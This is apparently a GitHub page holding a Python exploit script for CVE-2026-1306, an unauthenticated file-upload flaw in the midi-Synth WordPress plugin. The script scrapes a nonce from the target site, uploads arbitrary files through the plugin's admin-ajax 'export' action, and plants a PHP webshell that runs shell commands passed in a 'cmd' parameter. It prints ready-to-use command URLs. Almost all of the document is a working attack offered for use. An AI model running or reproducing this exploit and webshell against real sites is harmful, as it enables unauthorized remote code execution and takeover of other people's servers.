-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathCVE-2026-1306.py
More file actions
170 lines (149 loc) · 6.22 KB
/
CVE-2026-1306.py
File metadata and controls
170 lines (149 loc) · 6.22 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
#!/usr/bin/env python3
"""
[*] CVE-2026-1306 - midi-Synth <= 1.1.0 Arbitrary File Upload
[*] Vulnerability: Unauthenticated file upload via export AJAX action
[*] CVSS: 9.8 (Critical) | CWE-434: Unrestricted Upload of File
[*] Made By Fsociety
"""
import requests
import argparse
import sys
import re
import base64
import random
import string
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def banner():
print(r"""
╔════════════════════════════════════════════════╗
║ CVE-2026-1306 Exploit - midi-Synth File Upload║
║ WordPress Plugin <= 1.1.0 ║
║ Unauthenticated Arbitrary File Upload → RCE ║
║ Made By Fsociety ║
╚════════════════════════════════════════════════╝
""")
def rand_str(n=8):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=n))
def get_nonce(target, verify=False):
"""Extract nonce from frontend JavaScript"""
print(f"[+] Fetching nonce from {target}")
try:
resp = requests.get(target.rstrip('/'), verify=verify, timeout=10)
if resp.status_code != 200:
print(f"[-] Failed: HTTP {resp.status_code}")
return None
match = re.search(r'var midiSynth_nonce\s*=\s*"([a-z0-9]+)"', resp.text)
if match:
print(f"[+] Nonce: {match.group(1)}")
return match.group(1)
print("[-] Nonce not found in page")
return None
except Exception as e:
print(f"[-] Error: {e}")
return None
def upload_file(target, nonce, filename, content, verify=False):
"""Upload file via vulnerable export endpoint"""
ajax_url = f"{target.rstrip('/')}/wp-admin/admin-ajax.php"
payload = {
"action": "export",
"nonce": nonce,
"fileName": filename,
"fileMidi": base64.b64encode(content.encode() if isinstance(content, str) else content).decode()
}
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Origin": target.rstrip('/'),
"Referer": f"{target.rstrip('/')}/"
}
print(f"[+] Uploading: {filename}")
try:
resp = requests.post(ajax_url, data=payload, headers=headers, verify=verify, timeout=15)
return resp.status_code == 200
except Exception as e:
print(f"[-] Upload error: {e}")
return False
def verify_upload(target, filename, verify=False):
"""Check if uploaded file is accessible"""
file_url = f"{target.rstrip('/')}/wp-content/plugins/midi-synth/sound/{filename}"
try:
resp = requests.get(file_url, verify=verify, timeout=10)
if resp.status_code == 200:
print(f"[✓] File accessible: {file_url}")
print(f"[+] Content preview: {resp.text[:100]}")
return True
print(f"[-] File not found (HTTP {resp.status_code})")
return False
except Exception as e:
print(f"[-] Verify error: {e}")
return False
def upload_webshell(target, nonce, verify=False):
"""Upload a simple PHP webshell for RCE"""
shell_name = f"shell_{rand_str(6)}.php"
# Simple PHP shell that executes ?cmd= parameter
shell_content = """<?php if(isset($_GET['cmd'])){system($_GET['cmd']);}?>"""
if upload_file(target, nonce, shell_name, shell_content, verify):
shell_url = f"{target.rstrip('/')}/wp-content/plugins/midi-synth/sound/{shell_name}"
print(f"[✓] Webshell uploaded: {shell_url}")
print(f"[+] Execute: {shell_url}?cmd=whoami")
return shell_url
return None
def main():
banner()
parser = argparse.ArgumentParser(
description="CVE-2026-1306: midi-Synth Arbitrary File Upload",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -t http://target.com --check
%(prog)s -t http://target.com -f test.txt -c "pwned"
%(prog)s -t http://target.com --shell
%(prog)s -t https://target.com -k --shell
"""
)
parser.add_argument("-t", "--target", required=True, help="Target WordPress URL")
parser.add_argument("--check", action="store_true", help="Check if vulnerable")
parser.add_argument("-f", "--filename", help="Filename to upload")
parser.add_argument("-c", "--content", default="CVE-2026-1306 test", help="File content")
parser.add_argument("--shell", action="store_true", help="Upload PHP webshell for RCE")
parser.add_argument("-k", "--insecure", action="store_true", help="Disable SSL verification")
args = parser.parse_args()
verify = not args.insecure
# Step 1: Get nonce
nonce = get_nonce(args.target, verify)
if not nonce:
print("[-] Failed to extract nonce. Is plugin installed?")
sys.exit(1)
# Check mode: upload test file
if args.check or args.shell:
test_name = f"test_{rand_str(6)}.txt" if not args.shell else None
if args.shell:
shell_url = upload_webshell(args.target, nonce, verify)
if shell_url:
print(f"\n[!] RCE ready: {shell_url}?cmd=id")
sys.exit(0)
sys.exit(1)
else:
if upload_file(args.target, nonce, test_name, args.content, verify):
if verify_upload(args.target, test_name, verify):
print(f"\n[!] Target VULNERABLE to CVE-2026-1306")
sys.exit(0)
sys.exit(1)
# Custom file upload
if args.filename:
if upload_file(args.target, nonce, args.filename, args.content, verify):
if verify_upload(args.target, args.filename, verify):
print("[✓] Upload successful")
sys.exit(0)
print("[-] Upload failed")
sys.exit(1)
# Show help
print("[!] Use --check, -f/-c for custom file, or --shell for webshell")
print("[!] Example: python3 CVE-2026-1306.py -t http://target.com --shell")
sys.exit(1)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\n[!] Interrupted")
sys.exit(130)